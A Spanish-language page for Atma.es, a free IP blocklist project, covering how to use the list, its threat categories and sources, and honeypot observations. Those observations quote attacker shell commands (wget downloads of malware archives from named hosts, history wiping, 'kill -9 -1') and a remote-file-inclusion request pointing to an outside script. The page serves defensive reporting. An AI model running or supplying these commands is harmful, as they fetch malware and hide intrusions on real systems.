Presentación 

El objetivo de Atma.es es identificar direcciones de red maliciosas en internet tales como:

• Ataques que permiten espiar o incluso tomar el control remoto de ordenadores ajenos por medios como la terminal remota de Microsoft, SSH, Telnet, o servidores de escritorio remoto.

• Riesgos relacionados con el correo electrónico, como el rastreo y validación de direcciones de correo para enviar correo basura, el robo de cuentas, etc.

• Sitios que tratan de infectar a sus visitantes con virus, troyanos, programas espía, etc. o bien son usados por éstos para comunicarse con sus creadores cuando ya se ha producido la infección.

• Peligros para servidores: explotación de vulnerabilidades, identificaciones falsas, ataques para tomar su control, etc.

• Escaneos en busca de puertas traseras por donde poder acceder a ordenadores vulnerables a través de la identificación del sistema operativo y su versión, programas y servicios que se están ejecutando, etc.

• Distribución de virus, gusanos, etc. a través de redes P2P, o simplemente de archivos o tráfico corrupto.

La lista con las direcciones identificadas se actualiza periódicamente y se ofrece en formato PeerGuardian, válido para cualquiera de los programas de bloqueo más habituales. Tan sólo tendrá que indicarle una de las siguientes direcciones para su descarga:

• http://www.atma.es/atma.p2p (la descargar podría estar prohibida para IPs que estén en la lista o próximas a ellas)
• http://galinux.myftp.org/atma.p2p (la descargar podría estar prohibida para IPs que estén en la lista o próximas a ellas)
• http://list.iblocklist.com/?list=tzmtqbbsgbtfxainogvm   (Comprimido con Gz)
• http://list.iblocklist.com/lists/atma/atma   (Comprimido con Gz)

Documentación 

Guias de uso 

  Peerguardian 2 para Windows       IPlist/IPblock 0.26 para Linux

Peerblock: añade una lista nueva y pega http://list.iblocklist.com/lists/atma/atma

 

Preguntas y respuestas

¿Cómo puedo usar la lista blacklist/atma?

La mayoría de programas de bloqueo vienen con unas pocas listas preconfiguradas a elegir entre las que no suele estar blacklist.p2p/atma.p2p. La forma de añadirla varía en cada uno pero suele ser una tarea bastante sencilla (vea arriba "Guías de uso"). Si lo deseas, puedes ver cómo hacerlo con Peerguardian e IPlist/IPblock en la sección "guías de uso". Nuestra lista se publica en formato Peerguardian 1, que es compatible con la práctica totalidad de los programas de bloqueo existentes. Si aún no lo has hecho, puedes elegir uno en la sección de descargas.

En cuanto a términos de uso, la lista es libre y gratuíta para cualquier fin no lucrativo. Si no es el caso, consúltanos.

¿Porqué debería de usar esta lista si el programa que yo uso ya trae varias?

Sobre todo porque algunas direcciones de Internet que recogemos en ella frecuentemente no aparecen en otras listas o lo hacen pasado un tiempo, por varios motivos:

1. Identificamos las direcciones peligrosas con herramientas propias no publicadas en ningún sítio y que no están basadas en ninguna otra. Los atacantes no pueden esquivarlas porque no saben cómo funcionan (en el caso de que supiesen de su existenca). Además, tampoco pueden saber dónde les estamos esperando porque usamos direcciones IP dinámicas, es decir, que cambian periódicamente. Tras un ataque, cuando vean al día siguiente que aparecen en nuestra lista, nosotros ya habremos cambiado de dirección IP y resultará inútil que avisen a sus cómplices.
   
2. Es elaborada por hispanohablantes. Al menos en temas informáticos, la lengua inglesa es imperante. Por ello, los atacantes suelen saber Inglés pero resulta mucho menos probable que entiendan el Español/Castellano, por lo que en muchas ocasiones no llegan jamás a saber que han caído en una trampa, o cuál era: tan simple como que no comprenden lo que ven en sus monitores.
   
3. EL método habitual de detección de ataques es la vigilancia más o menos pasiva de lo que llega a nuestra red local, pero nosotros no esperamos sentados a que nos ataquen por casualidad. Por el contrario, emitimos una gran cantidad de señales falsas aparentando ser una red vulnerable de una empresa media, consiguiendo atraer a un gran número de atacantes en muy poco tiempo. Incluso cuando hay expectativas de identificar a toda una banda, frecuentemente nos infiltramos en sus grupos haciéndonos pasar por "hackers/crackers" (existe una polémica bastante absurda sobre el significado exacto de estos términos).

¿Debería de usar sólo esta lista o combinada con otras?

Por una parte, cuantas más listas uses, más tiempo de cálculo necesitará tu programa de bloqueo. Si tu ordenador ya tiene algunos años, es un aspecto a considerar. Por otro lado, a pesar de que incluímos direcciones peligrosas recogidas por terceros en otras listas, es casi imposible que estén todas las que debieran. Desde luego, siempre resultará más seguro usar más de una fuente (otras se actualizan con mayor frecuencia o son más específicas), pero Atma es una lista multipropósito que puede resultar perfecta para la mayor parte de usuarios domésticos o profesionales. Para darte una idea del tipo de amenazas que incluímos en nuestras lista, écha un vistazo a su composición a finales de marzo de 2010:

Amenaza:	Etiqueta en la lista:	IPs/rangos:
Publicidad no deseada por correo, en foros, etc. Propagación de virus, troyanos, gusanos, etc. Peligro desconocido o sin clasificar Toma de control por SSH Peligroso para servidores de correo electrónico Propagación de virus, troyanos, etc. en redes P2P Tráfico corrupto en redes P2P Varias amenazas de distinto tipo Peligroso para servidores SQL Escaneo de puertos Buscador de "proxies" abiertos Peligroso para servidores HTML/PHP/SQL Toma de control por Telnet Toma de control por consola remota Microsoft Peligroso para servidores FTP Tráfico malicioso en redes P2P Toma de control por escritorio remoto Otros Total de IPs individuales: 88125	Spammer Malware Unspecified Threat SSH Attack SMTP Port 25 Attack P2P Malware P2P Corrupted Packets Several Threats Threat For SQL Servers Port Scan Attack Proxy Seeker Threat For Web Servers Telnet Attack MS-Terminal Attack FTP Attack P2P Unrequested Responses VNC Attack Otras descripciones	20667 14846 10979 5348 4183 2704 2388 1577 688 554 476 471 234 191 173 112 68 38

Ten presente que no incluímos IPs:

• Sobre sexo, publicidad, rastreadores de usuarios P2P, etc. a menos que explícitamente contengan algún tipo de amenaza.
• Algunas IPs/rangos reservados para redes locales, pruebas, etc. de las enunciadas en http://tools.ietf.org/html/rfc3330
• Sitios de compañías u organizaciones de especial relevancia, tales como Google, Microsoft, Rapidshare, Yahoo y otras.
  (Sin embargo recuerda que incluso una sencilla búsqueda en Google, por ejemplo, podría llevarte hacia sitios maliciosos)

Si quieres bloquear algo de lo anterior, definitivamente necesitarás listas adicionales.

¿Cómo es la política de borrado de la lista?

Todas las IPs son eliminadas de la lista al cabo de un periodo de tiempo que va desde un mínimo de dos meses (amenazas menores como por ej. "Pingers") hasta un máximo de 5 (los más peligrosos y con abultados historiales a sus espaldas). Por supuesto, los falsos positivos se eliminan en cuanto tenemos conocimiento de ellos. Ésta era la antigüedad de cada entrada a finales de junio de 2010:

IPs/rangos añadidos en:	IPs/rangos:
El mes actual (junio) Hace 1-2 meses(mayo) Hace 2-3 meses(abril) Hace 3-4 meses(marzo)	40261 21420 21101 213

¿Seguiré necesitando antivirus, cortafuegos, etc.?

Sí. Usando nuestra lista con su programa de bloqueo, solamente evita el contacto por Internet con gran parte de los equipos peligrosos que acechan en la red... ¡pero podría usted dar con uno nuevo o no identificado!. Además, hay muchas formas de infectar un ordenador que no hacen uso de la red, como puede ser con memorias USB, archivos en CDs, etc.

Ya estoy usando la lista Atma pero sigo recibiendo correo basura.

Es cierto que una gran parte de la lista la constituyen direcciones IP de "spammers" y ello es por un motivo: quien envía correos basura es muy probable que represente algún otro tipo de amenaza, especialmente para quienes administren servidores, foros, blogs, etc. Por otra parte, en la lista jamás incluiremos servidores de correo de los más importantes proveedores, como puedan ser Gmail, Hotmail, Yahoo, etc. Desgraciadamente, gran parte del correo basura que te llegue lo hará desde cuentas de esas compañías. Si no estás satisfecho con sus propios filtros anti-basura y usas algún programa de gestión de correo, puedes probar a instalar algún filtro en tu equipo.

¿Es una lista muy usada?

Suponemos que en absoluto hasta febrero de 2010, pero sólo teníamos datos fehacientes de las descargas desde uno de los alojamientos (galinux.myftp.org). Como dato orientativo, desde ese sitio se había descargado 5000 veces en enero de 2010. Sin embargo, desde entonces ha sido incluída en el que tal vez sea el sitio más importante sobre listas de bloqueo: iblocklist.com

¿Qué significan las descripciones que veo en las alertas de mi programa de bloqueo?

Recuerde que el hecho de que un atacante tenga un objetivo determinado, no significa que vaya a renunciar otro si se le presenta la ocasión. Tampoco un ordenador que corra con un sistema operativo queda por ello protegido de todo tipo de ataques no específicos contra ese en concreto. Por ejemplo, hay formas de ejecutar servicios propios de Unix/Linux tales como SSH en equipos con Windows, y viceversa; incluso hay riesgos universales como por ejemplo, tener funcionando un servidor FTP con una contraseña débil. Dicho eso, las alertas responden a tres tipos de objetivos:

• Ataques específicos a servidores
• Peligros para usuarios de programas de intercambio
• Amenazas para todo tipo de usuarios y equipos

Según su gravedad, los escaneos sólo tratan de obtener algún tipo de información (aunque pueden ser el primer paso para un ataque más serio). En el otro extremo, identificamos con "several attacks" a aquellas IPs de las que hemos detectado varios tipos de ataques, y que por ello resultan las más peligrosas.

Curiosidades

 Ejemplos de ataques detectados por SSH:

Obteniendo información w uptime id ls -a uname -a cat /proc/cpuifno ps x wget curl -O Ataque tras una conexión anterior rm -rf .bash_history history -c w ps x ls -a Tratando de escapar de la trampa bash sh kill -9 -1 reboot exit

Enviando malware al equipo atacado uname -a passwd wget http://nasa.undernet.nm.ru/udp.tgz tar zxvf udp.tgz Otros envíos vinieron de dragutrau.clan.su/Trade/army.tar.gz freewebtown.com/hotzu/py/ryo.tar prigat.ucoz.com/mangalia.tgz No quieren que sepamos lo que hacen unset HISTFILE HISTSAVE HISTLOG WATCH HISTFILE=/dev/null Tratando de ejecutar malware cd /dev/shm su

 Algunas detecciones llamativas:

• Escaneos por Telnet desde 128.59.14.100 -128.59.14.116 (Universidad de Columbia), que resultaron ser un proyecto de investigación.
• Archivos falsos en la red Gnutella desde 65.50.67.197 (www.markmonitor.com) en marzo de 2010... ¡al buscar archivos de dominio público!
• Escaneo de puertos el 21 de diciembre de 2009 desde la 69.48.241.84 (www.trustedsource.org perteneciente a McAfee Antivirus).
• Archivos falsos en la red Gnutella desde la IP 65.55.102.24 (Microsoft Corporation) el 21 de octubre y 1 de noviembre de 2009.
• Escaneo de puertos en septiembre y octubre de 2009 desde la IP 208.43.71.139 (Avast Antivirus).

 Programas de bloqueo descargando blacklist/atma en la primera semana de Diciembre de 2009:

Descargas 760 253 112 43 14 7 4 4 2 1 Totales 916 253 14 11

Programa/Versión PeerBlock/1.0.0.181 PeerGuardian/2.0 PeerBlock/1.0.0.202 PeerBlock/1.0.0.223 BlockControl/1.6.9 PeerBlock/0.9.2.86 IPblock/0.18 IPblock/0.27 IPblock/0.26 PeerBlock/1.0.0.187 Programa PeerBlock PeerGuardian BlockControl IPblock

 En septiembre de 2009 intentaron averiguar la contraseña de 10374 nombres de usuario distintos. Los más atacados fueron:

9850 1034 690 431 264 224 208 206 195 190

root admin test oracle user guest robert mysql michael paul

190 177 176 176 168 166 162 154 152 148

info postgres amanda adam sales martin backup student ftpuser suporte

132 130 130 130 126 126 124 120 115 114

testing nagios eric david web tester john richard sarah sam

114 110 107 106 104 102 101 100 100 100

patrick bruce matt mark cyrus teste marc webmaster mail download

    Conclusi�n: crear cuentas de usuarios que no est�n en ingl�s dificulta en gran medida los ataques. Hispanohablantes eviten "david".

 Los chicos malos no descansan nunca:

2009, noche del 24 al 25 de diciembre. Mientras buena parte del mundo celebra en familia el aniversario del nacimiento de Jesucristo, los atacantes aprovechan la ocasión. En pocas horas se detectaron tantos ataques como en varios días cualquiera. El más llamativo fue un ataque de diccionario por SSH recibido desde 209.44.120.2 que duró 8 horas durante las que probó 20.859 combinaciones de usuario + contraseña.

7 de julio de 2010. Mientras en España y Alemania todo el mundo está pendiente del partido que enfrenta a las selecciones de ambos países para su pase a la final del mundial, en un servidor español se detecta un (aparentemente) exitoso ataque de diccionario por SSH:

Jul 7 19:27:42 [void] sshd[28641]: Accepted password for [void] from 76.191.100.182 port 47065 ssh2
Jul 7 20:25:37 [void] sshd[12823]: Accepted password for [void] from 121.189.19.126 port 46649 ssh2
Jul 7 21:17:08 [void] sshd[8048]: Accepted password for [void] from 79.112.214.99 port 1266 ssh2
Jul 7 23:45:48 [void] sshd[28775]: Accepted password for [void] from 221.111.75.119 port 33195 ssh2
Jul 7 23:47:14 [void] sshd[31450]: Accepted password for [void] from 221.111.75.119 port 51866 ssh2
Jul 7 23:53:28 [void] sshd[8496]: Accepted password for [void] from 188.24.255.242 port 30856 ssh2 

Formas "curiosas" de luchar contra el cibercrimen:

Visita recibida desde www.delitosinformaticos.gov.co (agencia gubernamental colombiana "Grupo Investigativo Delitos Informáticos") :

200.93.147.154 - - [17/Feb/2010:13:57:49 +0200] "GET //poll//booth.php?include_path=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 613 www.atma.es "-" "Mozilla/5.0" "-"

Sin comentarios :D

Colaborar 

• ¿Alguna vez has perdido importantes documentos por culpa de virus, troyanos, gusanos, etc.?
• ¿Has perdido alguna vez un montón de horas tratando de desinfectar o recuperar tu ordenador?
• ¿Desearías que nadie se dedicase a rastrear lo que haces en Internet?
• ¿Sabes que a diario se producen fraudes y robos "on-line" de cuentas bancarias, números de tarjetas, etc.?
• ¿Odias tener que dedicar todos los días un buen rato a limpiar tu bandeja de entrada de correo basura?

Hay muchas formas en las que puedes ayudar a protegernos todos de los culpables:

1-Usando y difundiendo nuestra lista

Puedes ayudarnos y ayudar a otros a protegerse dando a conocer nuestro trabajo enlazándolo desde tu sitio web o blog, recomendándolo a tus contactos, etc. Además, si usas nuestra lista, te agradecemos que nos comuniques si te ha bloqueado el acceso a algún sitio legítimo, si crees que alguno peligroso ha cambiado de IP o cualquier otra cosa que nos ayude a mejorar.

Por otra parte, como el número de descargas va en aumento, previsiblemente tendremos problemas en un futuro próximo. Si dispones de algún alojamiento con capacidad de tráfico excedente y dos megabytes libres, puedes ayudarnos manteniendo una copia de la versión más nueva de la lista. En ese caso infórmanos para incluír tu sitio en la sección "Presentación".

2-Envío de registros ( logs ) de programas que pueden identificar IPs peligrosas

Hemos elaborado algunas herramientas automáticas de búsqueda, selección y clasificación de direcciones IP atacantes a partir de registros generados por distintos programas, por lo que podemos procesar los recibidos es cuestión de segundos sin tan siquiera mirarlos. Si crees que algún registro de tu sistema puede ser de utilidad, escríbenos: seguramente podríamos usar varios de ellos. Por el momento estamos trabajando con los de algunos programas de intercambio P2P, con los de ciertos modelos de enrutadores (routers) y también con los de de sistemas Linux y algún otro programa.

3-Envío suelto de direcciones IP o rangos de IPs.

Si sabes cómo identificarlas en un contexto concreto (correos basura que dirigen a ciertos sitios, ataques a tus servidores, corrupción de archivos en P2P, registros de Linux, etc.) puedes enviarnos aquellas que vayas encontrándote. Hay muchas formas en las que se pueden detectar IPs peligrosas con muy poco esfuerzo durante el trabajo habitual frente al ordenador.

4-Instalación de trampas para atacantes

Conocidas como "Tarros de miel" ( Honey Pots ), hacen que nuestro ordenador o red local parezcan lo que no son desde el exterior, simulando otros sistemas operativos, servicios o programas inexistentes, falsas "puertas traseras" abiertas, etc. Pueden llegar a ser enormemente complicadas, pero las más simples son muy fáciles de instalar y efectivas en la mayoría de los casos. Si te decides por esta opción, aquí estaremos para asesorarte en el proceso.

5-Avisos de falsos positivos, revisión de IPs o rangos identificados por otros miembros, etc.

Todos nos podemos equivocar e incluír en la lista a direcciones que no son peligrosas; además es necesario eliminar periodicamente a los que ya no lo sean, atender a solicitudes de exclusión, etc. Es bienvenida toda la ayuda posible en la gestión diaria de la lista pero, sobre todo, que nos hagas saber si nuestra lista está bloqueando a algún sitio legítimo.

Enlaces 

Programas de bloqueo para Microsoft Windows

PeerBlock   PeerGuardian   ProtoWall (no código abierto)   Outpost Pro (no gratuíto)   BeeThink IP blocker (no gratuíto)

Programas de bloqueo para Linux

IPBlock/IPList   MoBlock   PeerGuardian   NfBlock    EisFair-BFB

Programas de bloqueo para Mac-OS

PeerGuardian

Si conoces algún otro, agradecemos que contactes con nosotros para incluírlo en esta lista.

Fuentes externas de direcciones peligrosas

En nuestra lista integramos diariamente las más recientes amenazas detectadas en otros sitios de confianza, a quienes agradecemos que compartan su información:

Amos.TwilightParadox.com    Antispam.Andreotti.nl*    Autoshun.org*    Blackip.ustc.edu.cn    Blocklist.de    Boston.comites-it.org    Cats-cradle.org    Cert.ntnu.edu.tw    Check.Torproject.org    ChessPlays.ru    Chriskujawski.com    Clean-mx.de*    Cyber-ta.org    Cs.Rutgers.edu    Danger.rulez.sk    DnsBL.Abuse.ch*    Dynastop.tanaya.net/    Dr-data.net    Elfagr.net    Elite-proxies.blogspot.com    EmergingThreats.net    EvilDayStar.net    EvolutionArts.net    Files.sabmx.net    Faciti.com    ForumPostersUnion.com    Franfremont.com    Fugitif.DynDns.org    Gamble-Irwin-Group.com    Genendesign.com    Gw.Paraibuna.com.br    Hackedreport.com/    Iantighe.com    IPillion.com    Jainvestigation.com    Kikurin.org*    Kish-telecom.com    Lists.evolt.org    Malc0de.com    MaliciousNetworks.org*    MalwareDomainList.com* MalwarePatrol.net    MalwareURL.com    Meganfath.com    Merlot.com    MosHunter.ru    Mtc.sri.com    MyIPtest.com    MyWot.com/wiki    NeilGunton.com    Nethavoc.net    Old-noritake.org    Outten.co.uk    Paradoxi.exisoft.nl    Pellegrinilab.org    PrairieHomeOutfitters.com    Progressiverehabmuskego.com    ProjectHoneyPot.org*    ProSouthRealty.com    Proxyfire.net    Puaga.com    Rblhu.net*    Red-uno.es    Revistamariela.com    Saleaccess.ru    Salemanuf.ru    Sans.org*    Sber2005.ru    Sblam.com    Senderbase.org    Semeliker.net    Shinshu.fm    Slyparadox.com    Smp.rnc.ro    Snortattack.org    Spam-ip.com    sshBL.org*    Stats.denyhosts.net    StopForumSpam.com    Sudosecure.net    Tcc.edu.tw    TheHackedReport.com    Threatexpert.com    Trustedsource.org    Twitter.com/compromised_sys    Twitter.com/HoneyPoint*    Twitter.com/olaf_j*    Uceprotect.net    Univedant.com    Unusualdischarge.com    Ustc.edu.cn    Virbl.bit.nl    VillagePlayers.org    Websworld.org    Xml.SsdSandBox.net    60bPictures.com    192.192.205.93    66.197.202.5   

Nota: al usar el buscador de IPs, en los resultados se reflejan las detecciones de los sitios marcados con *.

Es posible que te encuentres algunas IPs que aparecen en esos sitios pero no en nuestra lista. Ello es debido a que no añadimos todas ellas de forma automática si no siguiendo nuestros propios criterios.

Contacto 

Visita nuestro grupo en Google o envíanos un correo electrónico.